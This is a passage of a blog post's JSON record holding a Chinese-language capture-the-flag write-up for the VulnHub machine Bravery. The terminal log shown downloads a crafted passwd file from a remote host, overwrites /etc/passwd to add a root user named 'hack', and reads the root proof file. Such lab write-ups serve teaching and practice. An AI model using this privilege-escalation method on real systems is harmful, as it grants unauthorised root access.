http:\/\/10.160.78.86:8888\/passwd\nConnecting to 10.160.78.86:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 2641 (2.6K) [application\/octet-stream]\nSaving to: &#039;passwd&#039;\n\n     0K ..                                                    100%  570M=0s\n\n2024-03-22 15:04:27 (570 MB\/s) - &#039;passwd&#039; saved [2641\/2641]\n\nsh-4.2$ cp passwd \/etc\/passwd\ncp passwd \/etc\/passwd\nsh-4.2$ su hack\nsu hack\nPassword: hack\nwhoami\nroot\nid\nuid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:httpd_t:s0\ncd \/root\nls -la\ntotal 72\ndr-xr-x---. 17 root root 4096 Dec 26  2018 .\ndr-xr-xr-x. 18 root root  254 Sep 28  2018 ..\n-rw-------.  1 root root 5282 Dec 25  2018 .ICEauthority\n-rw-------.  1 root root    0 Jun 23  2018 .Xauthority\n-rw-------.  1 root root 2191 Dec 26  2018 .bash_history\n-rw-r--r--.  1 root root   18 Dec 28  2013 .bash_logout\n-rw-r--r--.  1 root root  176 Dec 28  2013 .bash_profile\n-rw-r--r--.  1 root root  176 Dec 28  2013 .bashrc\ndrwx------. 17 root root 4096 Jul  4  2018 .cache\ndrwxr-xr-x. 17 root root 4096 Jul  6  2018 .config\n-rw-r--r--.  1 root root  100 Dec 28  2013 .cshrc\ndrwx------.  3 root root   25 Jun 13  2018 .dbus\n-rw-------.  1 root root   16 Jun 13  2018 .esd_auth\ndrwx------.  3 root root   19 Jun 13  2018 .local\ndrwxr-xr-x.  4 root root   39 Jun 17  2018 .mozilla\n-rw-------.  1 root root   77 Jul  6  2018 .mysql_history\ndrwxr-----.  3 root root   19 Jun 10  2018 .pki\n-rw-------.  1 root root 1024 Jun 10  2018 .rnd\n-rw-r--r--.  1 root root  129 Dec 28  2013 .tcshrc\n-rw-------.  1 root root  584 Jul  4  2018 .viminfo\ndrwxr-xr-x.  2 root root    6 Jun 19  2018 Desktop\ndrwxr-xr-x.  2 root root    6 Jun 13  2018 Documents\ndrwxr-xr-x.  2 root root    6 Jun 13  2018 Downloads\ndrwxr-xr-x.  2 root root    6 Jun 13  2018 Music\ndrwxr-xr-x.  2 root root    6 Jun 13  2018 Pictures\ndrwxr-xr-x.  2 root root    6 Jun 13  2018 Public\ndrwxr-xr-x.  2 root root    6 Jun 13  2018 Templates\ndrwxr-xr-x.  2 root root    6 Jun 13  2018 Videos\n-rw-------.  1 root root 1408 Jun 10  2018 anaconda-ks.cfg\n----------.  1 root root  284 Dec 26  2018 author-secret.txt\ndrwxrwxrwx.  8 root root  236 Jun 23  2018 ossec-hids-2.8\n----------.  1 root root   39 Dec 25  2018 proof.txt\ncat proof.txt\nCongratulations on rooting BRAVERY. :)<\/code><\/pre>\n<p>\u8fd9\u6837\u5c31\u62ff\u5230root\u4e86\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"<p>DigitalWorld.Local:Bravery \u6709\u53f2\u4ee5\u6765\u5728vulnhub\u4e0b\u7684\u6700\u5927\u7684\u9776\u573a\u4e86\uff0c\u5bb3\uff01 \u65b0\u5efa\u4e00\u4e2a [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24],"tags":[],"class_list":["post-444","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/444","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=444"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/444\/revisions"}],"predecessor-version":[{"id":445,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/444\/revisions\/445"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=444"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=444"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=444"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}